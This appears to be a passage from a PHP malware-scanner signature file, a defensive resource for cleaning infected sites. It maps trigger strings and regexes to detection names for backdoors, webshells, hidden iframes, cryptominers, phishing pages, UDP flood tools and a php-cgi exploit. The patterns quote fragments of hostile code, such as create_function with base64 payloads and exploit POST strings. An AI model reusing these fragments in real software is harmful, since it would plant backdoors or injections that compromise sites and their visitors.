	'__FILE__' => array(STR_TRIGGER,

		'str_replace(\'!@#$%\',"\'",urldecode(' => array(STR_TRIGGER,
			'%3C%3F%70%68%70%20%0D%0A%2F%2A%0D%0A%0D%0A%4F' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.134', '\$[\w]+[\s]*=[\s]*str_replace\([^(]+,urldecode\([^;]+\)\);[\s]*\$[\w]+[\s]*=[\s]*dirname\(__FILE__\);[\s]*\$[\w]+[\s]*=[\s]*fopen\(\$[\w]+[^;]+\);[\s]*fwrite\(\$[\w]+,[\s]*\$[\w]+\.PHP_EOL\);[\s]*fclose\(\$[\w]+\);'),
		),

		'if (!file_exists(__FILE__)){echo "self deleted\n";}else{echo "self NOT deleted2\n";}' => array(STR_CLEARFILE,'php.backdoor.uploader.056', NULL),
		'written%3Dfwrite%28%24fp%2C%24fdata' => array(STR_CLEARFILE, 'php.backdoor.uploader.056.002', NULL),
	),

	'(\'<?php \'.$' => array(STR_TRIGGER,
		'if\(\$\w+\s*\=\s*\$this->\w+\(\$_SERVER\)\)\{' => array(REX_TRIGGER,
			'\$this->\w+\s*=\s*\'create\';' => array(REX_CLEARFILE, 'php.backdoor.remote_execution.001', NULL),
		),
	),

	'$out=fopen($save_to, "wb");while ($chunk' => array(STR_TRIGGER,
		'php\');unlink($_SERVER[\'SCRIPT_FILENAME\']);?>' => array(STR_CLEARFILE, 'php.backdoor.uploader.071', NULL),
	),

	'getImageEncodedText' => array(STR_TRIGGER,
		'unserialize($this->getImageDecodedText' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.004', NULL),
	),

	'simplexml_load_file("http' => array(STR_TRIGGER,
		',"a");fwrite($' => array(STR_CLEARFILE, 'php.malware.redirect.037', NULL),
	),

	'getFile("http' => array(STR_TRIGGER,
		'while(!feof($file)) {' => array(STR_CLEARFILE, 'php.hacktool.downloader.010', NULL),
	),

	'curl_exec' => array(STR_TRIGGER,
		'if(mkdir($random, 0755)){' => array(STR_CLEARFILE, 'php.phishing.generic.080', NULL),
	),

	'fwrite(fopen(dirname(__FILE__).\'/\'.$r[\'f\'],\'w+\'),$r[\'b\'])'=> array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader_gen.003', '\$r[\s]*=[\s]*\$_REQUEST;[\s]*\$[\w]+[\s]*=[\s]*getcwd[^\}]+scandir\(\$[\w]+\)\);[\s]*\}[\s]*exit[^;]*;[\s]*'),
	'fwrite($hix, base64_decode($dirut));' => array(STR_CLEARFILE, 'php.backdoor.backdoor_installer.001', NULL),
	'fwrite($new_v_file,"\$xred=base64_decode(\'$new_url\');\n"); }' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.009', NULL),
	'.php", "w+"); fwrite($fo, $cmd1); fclose($fo); ?>' => array(STR_CLEARFILE, 'php.backdoor.uploader.039', NULL),
	'zdaccess\',\'w\');fwrite($fd,$_POST[\'abbr_domain\']);fclose($fd);print \'Domain changed!' => array(STR_CLEARFILE, 'php.backdoor.generic.010', NULL),
	'http_get("http://pastebin.com' => array(STR_CLEARFILE, 'php.backdoor.pastebin_uploader.006', NULL), 
	'$g=array("Lmh0YWNjZXNz"=>$c,"Y2dpLXN0YXRlLmNnaQ=="=>$f);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.backdoor_installer.008', 'if.isset.._GET..\w+.\]\)\)\{\s*function a\(\$l\)\{[^\}]{10000,}Y2dpLWJpbg==[^\@]+\@ini_get..disable[^\?>]+?closedir.\$k.;\s*\}\s*\}'),
	'$keylog = $_POST[\'inp\'];' => array(STR_CLEARFILE, 'php.backdoor.uploader.098', NULL),
	'$this->testStorage(\'<?php \'.$channelID);' => array(STR_CLEARFILE, 'php.malware.include.030', NULL),
	'if ($vyborka = file("cache/$donor"))' => array(STR_CLEARFILE, 'php.spam-seo.links-donor.002', NULL),
	') { echo \' - <span class="label label-success">' => array(STR_CLEARFILE, 'php.backdoor.uploader.149', NULL),
	'$file = fread($fh, filesize("govno.jpg"));' => array(STR_CLEARFILE, 'php.backdoor.uploader.154', NULL),
),

'create_function' => array(STR_TRIGGER,

	'base64_decode' => array(STR_TRIGGER,

		'base64_decode($wp_kses_data);' => array(STR_TRIGGER,
			'preg_match(\'#<img src="data:image/png;base64,(.*)">#' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.create_function.016.02', '\$[\w]+[\s]*=[\s]*.<img src=[^>]+>[^;]+;[\s]*preg_match[^\[]+\$[\w]+[\s]*=[\s]*\$[\w]+\[[\d]+\];[\s]*if[\s]*\([\s]*isset[\s]*\([\s]*\$[\w]+[^{]+\{[\s]*\$[\w]+[\s]*=[\s]*base64_decode\(\$[\w]+\);[^}]+create_function\([\s]*..[\s]*,[\s]*\$[\w]+[^}]+\}'),
		),

		'create_function(chr(' => array(STR_TRIGGER,
			'\'.\'\'));' => array(STR_CLEAR_LINEMATCH, 'php.malware.create_function.011', '\$[\w]+[\s]*=[\s]*create_function\(chr\([^>]+base64_decode[^>]+str_rot13[^>]+\)\);'),
		),

		'base64_decode($_REQUEST[' => array(STR_TRIGGER,
			'(!empty($_REQUEST[' => array(STR_CLEAR_MULTIMATCH, 'php.malware.create_function.015', 'if[\s]*\(!empty\(\$_REQUEST\[.[\w]+.\][\s]*\)[\s]*\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*base64_decode\(\$_REQUEST\[.[\w]+.\][\s]*\);[\s]*\$[\w]+[\s]*=[\s]*create_function\([^;]+\);[\s]*\$[\w]+\(\);[\s]*exit;[\s]*\}'),
		),

		'$_COOKIE [str_replace(\'.\', \'_\', $_SERVER[\'HTTP_HOST' => array(STR_CLEARFILE, 'php.malware.create_function.004', NULL),
		'= create_function(null,gzuncompress(base64_decode' => array(STR_CLEAR_LINEMATCH, 'php.malware.create_function.013', '(?<=<\?php\s)(\$\w+)\s*=\s*create_function\((?:null,)?gzuncompress\(base64_decode\([\'"][^\)]+\)\)\)\s*;\s*\1\(\)\s*;'),
		'create_function(\'\', base64_decode(\'fSBpZighZGVmaW5l' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.dgreusdi.002.02', 'create_function\(.., base64_decode..fSBpZ[^;]+\);'),
		'array_map("base64_decode", unserialize($' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.114', '\$[\w]+[\s]*=[\s]*.[\w]+:[\d]+:\{[\w]+:[\d]+;[\w]+:[\d]+:[^\}]+;\}.;[\s]*\$[\w]+[\s]*=[\s]*array_map\(.base64_decode.,[\s]*unserialize\(\$[\w]+\)\);[\s]*\$[\w]+[\s]*=[\s]*implode\(\$[\w]+\);[\s]*\$[\w]+[\s]*=[\s]*create_function\([\w]+,[\s]*\$[\w]+\);[\s]*call_user_func\(\$[\w]+\);'),
	),

	'get_option' => array(STR_TRIGGER,
		';$z=get_option("_site' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.webshell_gen.042', ';.z=get_option.*base64_decode.*create_function[^}]*}'),
		'$z=get_option("_site' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.webshell_gen.043', '.z=get_option.*base64_decode.*create_function[^}]*}'),
		'$wp_optimize_func=create_function(\'\',get_option(\'wp_optimize\'));$wp_optimize_func();' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.db_shell.002','.wp_optimize_func=create_function...,get_option..wp_optimize...;.wp_optimize_func..;'),
		'function page_options() { $option = get_option(\'page_option\'); $opt=unserialize($option);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.dbload.001','function page_options\(\)[\s]*\{[\s]*\$option = get_option..page_option[^}]+create_function[^}]+\}[\s]*add_action\(.[\w]+.,[\s]*.page_options.\);'),
		'_func=create_function(\'\',get_option(\'wp_' => array(STR_CLEAR_LINEMATCH, 'php.malware.create_function.002', '\$wp_\w+_func=create_function\(..,get_option\(.wp_\w+.\)\);\$wp_\w+_func..;'),
		'create_function\([\s]*..,[\s]*@join\([\s]*..n.,[\s]*array_map\([\s]*.base64_decode' => array(REX_CLEAR_LINEMATCH, 'rex.backdoor.dbload.006', 'add_action\([\s]*.init.,[\s]*create_function\([\s]*..,[\s]*@join\([\s]*..n.,[\s]*array_map\([\s]*.base64_decode.,[\s]*json_decode\([\s]*get_option[^;]+\);'),
		'create_function(\'\', get_optionsjoom(\'joomplaupdateopt\'));' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.dbload.004', 'function [\w]+\(\$option\)[\s]*\{[\s]*\$db[\s]*=\&[\s]*JFactory::getDBO\(\);[\s]*\$query[\s]*=[\s]*\$db->getQuery\(true\);[\s]*\$query[\s]*->[\s]*select\(\$db[\s]*->[^>]+->[^>]+>quoteName\(.#__user_sessions[^}]+else[\s]*return[\s]*false;[\s]*\}[\s]*\$Update_Joomla[\s]*=[\s]*create_function\(..,[\s]*get_opt[^;]+\);[\s]*\$Update_Joomla\(\);'),
	),

	'base_convert' => array(STR_TRIGGER,
		'7d' => array(STR_TRIGGER,
			')){' => array(STR_TRIGGER,
				'substr($' => array(STR_TRIGGER,

					'!function_exists' => array(STR_TRIGGER,
						'base_convert[\s]*\([\s]*substr[\s]*\([\s]*\$' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.fake_docs_plugin.001', '(\$\w+)\s*=\s*[\'"]\w*[\'"]\s*;\s*(?:\1\s*\.=\s*[\'"]\w*[\'"]\s*;\s*)*?(?:\$\w+\s*=\s*\$\w+\s*;\s*)?if[^}]+chr\s*\(\s*base_convert\s*\(\s*substr[^}]+}[\s]*return\s*\$\w+\s*;[^;]+;\s*\$\w+\s*\(\s*\)\s*;'),
					),

					']){eval/*' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.generic.098', '\$\w+\s+=\s+\d+;\$GLOBALS\[\'\w+\'\]\s+=\s+Array\(\)\;global\s+\$\w+;\$\w+\s+=\s+\$GLOBALS;\$\{"(.x\w{1,3}){1,6}"\}\[\'\w+\'\]\s+=\s+"(.x\w{1,3}){1,100}\";(\$\w+\[(\$\w+\[\'\w+\'\]\[\d+\].){1,}\s+=\s+(\$\w+\[\'\w+\'\]\[\d+\].){1,}){1,15}[^g]*global\s+\$\w+;function\s+\w+\(\$\w+,.\$\w+\)\{global.\$\w+;\$\w+.=.\"\";for[^*]*\*\w+\*\/\(\$\w+\[\$\w+..\w+\'\]\[\d+\]\]\);\}exit\(\);\}\}'),
				),
			),
		),
	),

	']:(isset($_COOKIE[' =>  array(STR_TRIGGER,
		'=@gzinflate(' =>  array(STR_TRIGGER,
			'value=""/><input type="submit" value="&gt;"/></form>' => array(STR_CLEARFILE, 'php.backdoor.crypto_function.002', NULL),
		),
	),

	'=@gzinflate(strrev($' => array(STR_TRIGGER,
		'if(crc32($' => array(STR_CLEARFILE, 'php.backdoor.create_function_wp.001', NULL),
	),

	');}call_user_func(create_function(' => array(STR_TRIGGER,
		'function applyfilter(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.create_function.003', 'function applyfilter\(\$text=null\) *\{[^\{]++\{global (\$[0Oo1l]+);\1=create_function[^\n]++\s+if\(\$text[^,]++, .applyfilter., 1, 0\);\s+(add_action[^\n]++\n)+'),
	),

	'\']:(isset($_COOKIE[\'wp_' =>  array(STR_TRIGGER,
		'value=""/><input type="submit" value="&gt;"/></form>' => array(STR_CLEARFILE, 'php.backdoor.crypto_function.001', NULL),
	),

	', ceil (strlen ($' => array(STR_TRIGGER,
		' ^ str_repeat ($' => array(STR_CLEARFILE, 'php.backdoor.hex_xor.003', NULL),
	),

	'create_function("",' => array(STR_TRIGGER,
		'\$[\w]+[\s]*=[\s]*\$[\w]+\(\$[\w]+\(\$[\w]+\)\);[\s]*\$[\w]+[\s]*=[\s]*create_function\("",[\s]*\$[\w]+\);[\s]*\$[\w]+\(\);' => array(REX_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.077', '\$[\w]+[\s]*=[\s]*"[\w\/]+"[\s]*\.[\s]*"[\w\/]+"[^;]+;[^\(]+\(\$[\w]+\);[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\(\$[\w]+\);[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\(\$[\w]+\(\$[\w]+\)\);[\s]*\$[\w]+[\s]*=[\s]*create_function\("",[\s]*\$[\w]+\);[\s]*\$[\w]+\(\);'),
	),

	'if (!isset($_REQUEST[' => array(STR_TRIGGER,
		'create_function(null,gzinflate(convert_uudecode(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.create_function.013.02', 'if\s*\(\!isset\(\$_REQUEST\[.\w+.\]\)\)\s*(?:die\s*)?;\s*(\$\w+)\s*=\s*create_function\((?:null,)?\s*gzinflate\(convert_uudecode\([\'"][^\$]+\1\(\)\s*;'),
	),

	'eval(\$\x5F\x50\x4F\x53\x54[' => array(STR_TRIGGER,
		'@\x66\x6F\x70\x65\x6E(\$' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.009', '\$[\w]+[\s]*=[\s]*[^\(]+create_function\(.\$[\w]+.[\s]*,[\s]*\$[\w]+[\s]*\.[\s]*\$[\w]+[^\@]+\$[\w]+[\s]*=[\s]*@.x66.x6F[^\{]+\)[\s]*\{[\s]*.\$[\w]+[\s]*=[\s]*[^\}]+\[.\$[\w]+\];[\s]*\}[\s]*\}[^\?]+\(\);[\s]*\}[\s]*\}[\s]*(.x[0-9A-F]+)+[\s]*(.x[0-9A-F]+)+\(\);[\s]*\?>.\)\);'),
	),

	'=str_ireplace(' => array(STR_TRIGGER,
		'));}set_error_handler(' => array(STR_CLEARFILE, 'php.malware.curl.030', NULL),
	),

	'call_user_func(create_function(\'\',' => array(STR_TRIGGER,
		'function [O0l1]{3,}\(\)[\s]*\{global \$[\w]+;[\s]*return[\s]*call_user_func\(\$[\w]+' => array(REX_CLEARFILE, 'php.malware.create_function.016', NULL),
	),

	'120\117\123\124\40\133\42\163\151\144\42\135\73\40\151\146\40\50\155\144\65\50' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.generic.035', 'function [\w]+\(\) \{[\s]*global \$[\w]+;[\s]*\$[\w]+ = create_function...inp,.key[^;]+;[^\\\\]+\(create_function\([^}]+\}[\s]*\}'),
	'$b5f = create_function(\'$\'.\'v\',$a5' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.c99-shell.002', '(\$md5\s=\s.\w{32}.\);\n)?\$a5\s=\sarray[^>]+create_function..\$[^v]+v.,\$a5[^>]+?\$b5f[^;]+;'),
	'create_function(\'$\'.\'v\',$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.087', '\$md5 = .\w{32}.;\s*\$\w+ = array\(.+?(\$\w+) = create_function..\$.\.[^;]+;\s*\1\([^\)]+\);'),
	'array(0,97,98,99,100,101,108,115,118,105,110,111,117,109,112,114)' => array(STR_CLEAR_MULTIMATCH, 'php.malware.google_api.001','\/\*16\*\/ function [^<\}=]+?=array.0,97,98,99,100,101,108,115,118,105[^\?]+?\$____[^\?]+?"\)\)\);'),
	'function register_and_cache_taxonomy() {' => array(STR_CLEARFILE,'php.backdoor.taxonomy.001', NULL),
	'$a = array(\'v\',\'e\',\')\',\'b\',\'s\',\'c\',\'l\',"z","r",\'o\',"a",\'$\',\';\',\'i\',\'t\',"n",\'_\',"f",\'6\',"g","4","d",\'(\');' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.048', NULL),
	'chr(39).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(39).chr(41).chr(41).chr(123' => array(STR_CLEARFILE,'php.backdoor.webshell.004', NULL),
	'$fn=create_function(\'\',("};".strrev(urldecode(str_replace(".","%",".3B.29.22' => array(STR_CLEARFILE, "php.backdoor.filesman.031", NULL),
	'$check_copyright = create_function' => array(STR_CLEARFILE, 'php.backdoor.check_copyright.001', NULL),
	'$JSubMenuHelper = create_function(\'\', $JSubMenu);' => array(STR_CLEARFILE, 'php.backdoor.create_function.014', NULL),
	'$run_ioncubetesterplus = create_function(\'\', "\x40".$Keys' => array(STR_CLEARFILE, 'php.backdoor.generic.040', NULL),
	'$errno,$errstr,$errfile,$errline){array_map(create_function(\'\',$errstr),array(\'\'));}' => array(STR_CLEARFILE, 'php.backdoor.uploader.088', NULL),
	'$errstr); array_map($' => array(STR_CLEAR_MULTIMATCH, 'php.malware.create_function.012', '\$[\w]+[\s]*=[\s]*"[^;]+;(if\(version_compare\(PHP_VERSION[^\}]+\})?[\s]*\$[\w]+[\s]*=[\s]*str_ireplace\([^;]+\);[\s]*\$[\w]+[\s]*=[\s]*.[^;]{1000}[^;]+;[\s]*function[^\}]+\}[\s]*set_error_handler[^;]+\);[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\([^;]+\);[\s]*[\w]+_error\(\$[^;]+E_USER_ERROR\);'),
	'};\'.urldecode(gzinflate(urldecode($' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.121', NULL),
	'@create_function(\'\', $_POST[' => array(STR_CLEARFILE, 'php.backdoor.create_function.022', NULL),
	'$(lave\'));' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.create_function.021', '(\$[\w]+[\s]*=[\s]*create_function|\$[\w]+[\s]*=[\s]*[\'"][^;]+\\\\x..[\'"][^;]+;[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+)\(.\$[\w]+.,[\s]*strrev\(.;\)[\w]+\$\(lave.\)\);[\s]*\$[\w]+\(strrev\(.;[^;]+\);'),
	'=create_function(null,gzinflate(convert_uudecode("' => array(STR_CLEAR_MULTIMATCH, 'php.malware.obfuscated.022.02', '\$\w+=create_function\(null,gzinflate\(convert_uudecode\(\"[^$]*\$\w+\(\);'),
),

'<ifram' => array(STR_TRIGGER,

	'<iframe src=' => array(STR_TRIGGER, 

		'function google_webmaster_tools() {' => array(STR_TRIGGER,
			'$gwebmasters_code = \'<iframe src="http' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.011', NULL),
		),

		'<iframe src="<?php echo file_get_contents(\'http:' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.021', '<iframe\s*src=.<\?php\s*echo\s*file_get_contents\(.[htps]{4,}:[^\?]+\?\w+=\w+.\);\s*\?>.\s*border=.0.\s*width=.1px.\s*height=.1px.><.iframe>'),
		'<iframe src="http\S+\/counter\.php"' => array(REX_CLEAR_MULTIMATCH, 'rex.iframe_counter.001', '<iframe src="http\S+\/counter\.php"[^<]+(?:<.iframe>|\/>)'),
		'<iframe src="http[^<>]*\.cgi\?\d"' => array(REX_CLEAR_MULTIMATCH, 'rex.iframe_cgi.001', '<iframe src="http[^<>*]*\.cgi\?\d"[^<>]*><.iframe>'),
		'<iframe src="http:[^:]+(cn|ru):8080.index.php" width=\d+ height=\d+ style="visibility: hidden"><.iframe>' => array(REX_CLEAR_MULTIMATCH, 'rex.iframe_generic.020', '<iframe src="http:[^:]+(cn|ru):8080.index.php" width=\d+ height=\d+ style="visibility: hidden"><.iframe>'),
		'Photo.scr' => array(STR_CLEAR_MULTIMATCH, 'php.iframe.photo_scr.001', '<iframe[^>]+src\s*=\s*[\'"]?Photo.scr[\'"]?[^<]+<.iframe>'),
		'frame1" style="background:transparent;border:none;width:1;height:1' => array(STR_CLEAR_LINEMATCH, 'js.malware.unwanted-ads.014', '<\s*iframe[^=]+=.https?:\/\/[^=]+=frame1.\s*style=.background\s*:\s*transparent\s*;\s*border\s*:\s*none\s*;\s*width\s*:\d+\s*;\s*height\s*:\s*\d+\s*;\s*position\s*:\s*fixed\s*;\s*right\s*:\s*\d+\s*;\s*z-index\s*:\s*\d+;\s*bottom\s*:\d+\s*;\s*opacity\s*:\s*\d+[^<]+<.iframe>'),
	),

	'hidden;' => array(STR_TRIGGER,

		'none;' => array(STR_TRIGGER,
			'<iframe[^>]+visibility:[\s]*hidden;[^>]*display:[\s]*none;[^>]+\.php\?id=\{' => array(REX_CLEAR_LINEMATCH, 'rex.iframe.generic.018', '<iframe\s*style\s*\=\s*.\s*[(?:\w+\:\;\-\s*)]+hidden[(?:\w+\:\;\-\s*)]+display\:\s*none[(?:\w+\:\;\-\s*)]+.\s*src\=.(?:https?\:\/\/)?[(?:\w+\-\.\/\s*)]+\.php\?id\=\{[(\w+\-)]+\}.><\/iframe>'),
			'dogeminers.com' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.007', '<\s*iframe\s*scrolling\s*=\s*.no.\s*src=\s*.http:\/\/dogeminers\.\w+(?:\.\w+)?\/\w+\.(?:php|js)\?ref=\d+.[^<]+<\/iframe>'),
			'preg_replace("/(\<body.*\>)/", "$1".$after_body, $output)' => array(STR_CLEAR_MULTIMATCH, 'php.malware.db_injector.004', 'add_filter\s*\(.\w+.\,\s*function\s*\(\$output\)\s*{\s*\$after_body\s*=\s*apply_filters\(.after_body.,\s*..\);\s*\$output\s*=\s*preg_replace\s*\(.\/\(.<body\.\*.>\s*\)\s*\/.,\s*.\$\d+.\.\$after_body,\s*\$output\s*\)\s*;\s*return\s*\$output\s*;\s*}\s*\)\s*;\s*add_action\s*\(.after_body.,\s*function\(\$after_body\)\s*{\s*\$after_body\.\s*=\s*.<iframe\s*src\s*=\s*.http(?:s)?:\/\/[^>]+>\s*<\/iframe>\s*[\'"]\s*;\s*return\s*\$after_body\s*;\s*}\s*\)\s*;'),
		),

		'coinpot.co/mine' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.009', '<iframe\s*scrolling\s*=\s*.no.\s*frameborder\s*=\s*.\d+.\s*src=\s*.http(?:s)?:\/\/coinpot\.co\/mine[^>]+><\/ifram[^>]+>'),
		'<iframe style=\'opacity: 0;visibility: hidden;border: 0;outline: 0;width: 0;height: 0' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.iframer.004', '<iframe[^:]+opacity:\s*0\s*;\s*visibility:\s*hidden\s*;\s*border:\s*0\s*;\s*outline:\s*0\s*.\s*width:\s*0\s*;\s*height:\s*0[^<]+<\/iframe>'),
	),

	'Twitter' => array(STR_TRIGGER,

		'document.write(\'<iframe' => array(STR_TRIGGER,
			'name=.?Twitter.? scrolling=.?auto.?' => array(REX_CLEAR_LINEMATCH, 'rex.iframe.generic.007.02', 'document.write\(.<iframe[^>]*name=.?Twitter.?[\s]*scrolling=.?auto.?[^>]+>[\s]*<.iframe>.\);'),
		),

		'<iframe name=Twitter scrolling=auto' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.007', '<iframe name=Twitter scrolling=auto[^>]+src=http:[^>]+><.iframe>'),
	),

	'/*mx_start*/' => array(STR_TRIGGER,
		'5.39.222.143/b92t' => array(STR_CLEAR_LINEMATCH, 'php.iframe.mx_start.001', '(?:<\?php\s*..mx_start..\s*\?>)?<iframe src=.http:..5\.39\.222\.143\/[^\>]+><.iframe>(?:<\?php\s*..mx_end..\s*\?>)?'),
		'/*mx_start*/<?php' => array(STR_CLEAR_MULTIMATCH, 'php.iframe.mx_start.002','\/\*mx_start\*\/<\?php[^>]+?echo[^>]+?left:-\d{4}px;.>[^>]+?echo .<iframe [^>]+?><.iframe><.div>[^>]+?\?>\/\*mx_end\*\/'),
	),

	'<div style="display:none;"></div><iframe ' => array(STR_TRIGGER,
		'google|youdao|yahoo|bing|118114|' => array(STR_CLEARFILE, 'php.spam-seo.japanese-spam.004', NULL),
		'echo $urls0.$siteurl.\'index.php?' => array(STR_CLEARFILE, 'php.spam-seo.japanese-spam.003', NULL),
	),

	'"http://reg.163.com/' => array(STR_TRIGGER,
		'.php' => array(STR_TRIGGER,
			'href="http://reg.163.com/getpasswd/RetakePassword.jsp?from=' => array(STR_CLEARFILE, 'html.phishing.163_com.003', NULL),
			'<script id="jsBase" type="text/javascript" src="http://mimg.127.net/index/lib/' => array(STR_CLEARFILE, 'html.phishing.126_com.002', NULL),
		),
	),

	'echo(\' <iframe src' => array(STR_TRIGGER,
		'= @file($way);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.iframer.003', '\\$way = .http[^;]+;[\\s]*\\$[\\w]+ = @file..way.;[\\s]*echo[^;]+<iframe src[^;]+style="position:absolute;left:-[^)]+\\);'),
	),

	'var _0x' => array(STR_TRIGGER,
		'"<div style=\'position:absolute;z-index:1000;top:-1000px;left:-9999px;\'><iframe' => array(STR_CLEAR_LINEMATCH, 'js.malware.nuclear.001', 'var _0x\w+=\[("[^"]*",)+?"<[^">]+?-9999px;.><iframe src=.",[^\]]+\];window\[_0x[^<]+?\(\w\)\}\};'),
	),

	'echo \'<iframe src="\' . $' => array(STR_TRIGGER,
		'if ((strcheck($useragent, \'Trident\')' => array(STR_CLEARFILE, 'php.malware.injector.035', NULL),
	),

	'/hide.php' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.019', '<iframe\s*src=.http[^h]+hide\.php[^:]+:1px[^<]+\s*<.iframe>'),
	'analitics1.in' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.001', '<iframe[^<]*http:..analitics1.in[^<]*<.iframe>'),
	'/counter.php" > </iframe><!--' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.002', '<iframe[^<]*counter\.php" > <.iframe>'),
	');}$_0=$GLOBALS[\'_' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.004', '.GLOBALS.*_0=.GLOBALS.*'),
	'_on*/ $' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.006', '\/.[a-z0-9]*_on.\/ [^?]*_off.\/'),
	'</iframe><!--/' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.008', '<iframe[^<]*<.iframe><.--.\w+-->'),
	'chura.pl/rc/"' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.012', '<iframe src=.http:..j..chura.pl\/rc\/. style=.display:none.><.iframe>'),
	'src="http://cort.as/O2Ak' => array(STR_CLEAR_MULTIMATCH, 'html.iframe.generic.013', '<iframe\s*src[^<]+cort.as.O2Ak[^<]+>\s*<.iframe>'),
	'88.80.190.133' => array(STR_CLEAR_LINEMATCH, 'js.iframe.scanbox.001', 'document.getElementsByTagName..head...0..appendChild.document.createElement..script....src=\'[^\']+\';document.write..<iframe[^\)]+?88.80.190.133..><.iframe>"\);'),
	'src="http://stats3244-toolbar-google.ru/' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.016', '<iframe[^>]+?src="http:..stats3244-toolbar-google.ru.\S+"[^>]+><.iframe>'),
	'iframe/index.php" width="0" height="0" align="left"></iframe>' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.015', '<iframe[^>]+iframe\/index.php" width="0" height="0" align="left"><.iframe>'),
	'|| strpos($fromurl, \'yahoo.co.jp\') !== false || strpos($fromurl, \'localhost\')' => array(STR_CLEARFILE, 'php.spam-seo.japanese-spam.001', NULL),
	'<title>&#12523;&#12452;&#12532;&#12451;&#12488;&#12531;&#38263;&#36001;&#24067;,&#12532;' => array(STR_CLEARFILE, 'php.spam-seo.japanese-spam.002', NULL),
	'google.ru/in.cgi' => array(STR_CLEAR_LINEMATCH, 'html.iframe.google_ru_in_cgi.001', '<iframe [^>]+google.ru\/in.cgi[^>]+?><.iframe>'),
	'securemaxcdn.com' => array(STR_CLEAR_LINEMATCH, 'html.malware.fakeCDN.001', '<div[^>]+><iframe src=.[^>]+securemaxcdn.com[^>]+><.iframe><.div>'),
	'#">We need your E-mail password to verify your' => array(STR_CLEARFILE, 'html.phishing.email_account.001', NULL),
	'<iframe src="http://web-service-amazon.pro/' => array(STR_CLEAR_LINEMATCH, 'html.iframe.wsa-pro.001', '<iframe src=.http:..web-service-amazon.pro[^>]+><.iframe>'),
	'<iframe src="http://lskogujft' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.017', '<iframe src="http:..lskogujft.co.tv[^>]+><.iframe>'),
),

'fsockopen' => array(STR_TRIGGER,

	'$otvet' => array(STR_TRIGGER,
		'if (strstr($otvet, \'BOT\')) $abt = 1;' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.frmtmp.001', '\@ini_set..display_errors., .0..;\s*@ini_set..max_execution_time., .10..;[^;]+;\s*if \( file_exists\(.\{\$eb\}\.st\/\.r".{3000,}?echo \$my_content;\s*\}\s*register_shutdown_function..shutdown..;'),
		'preg_match(\'#gogo(.*)enen#is\', $otvet, $mtchs);' => array(STR_CLEARFILE, 'php.backdoor.frmtmp_uploader.002', NULL),
	),

	'!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html' => array(STR_TRIGGER,
		'$packet  = "POST ".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input' => array(STR_CLEARFILE, 'php.hacktool.php_cgi_exploit.001', NULL),
		'$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq' => array(STR_CLEARFILE, 'php.hacktool.phpbb_memberlist_exploit.001', NULL),
	),

	'udp://' => array(STR_TRIGGER,
		'ignore_user_abort(TRUE);' => array(STR_TRIGGER,
			'isset($_GET[\'time\'])){' => array(STR_CLEARFILE, 'php.hacktool.UDPflood.006', NULL),
		),
	),

	'fsockopen(decrypt($this->' => array(STR_TRIGGER,
		'or strtolower(@ini_get("safe_mode' => array(STR_TRIGGER,
			'fsockopen("udp:' => array(STR_CLEARFILE, 'php.hacktool.UDPflood.004', NULL),
		),
	),

	'echo $data . $content;' => array(STR_TRIGGER,
		'urlencode(base64_encode(serialize($input)));' => array(STR_TRIGGER,
			'$data = @gzuncompress(substr($response, - $parts[1]));' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.176', '\\$input..REMOTE_ADDR[^;]+: null;[^@]+\\$request[^@]+\\$socket = @fsockopen[^@]+\\$data = @gzuncompress.substr[^\\.]+echo \\$data \\. \\$content;[\\s]*}'),
		),
	),

	'$data = json_decode(base64_decode(str_replace(' => array(STR_TRIGGER,
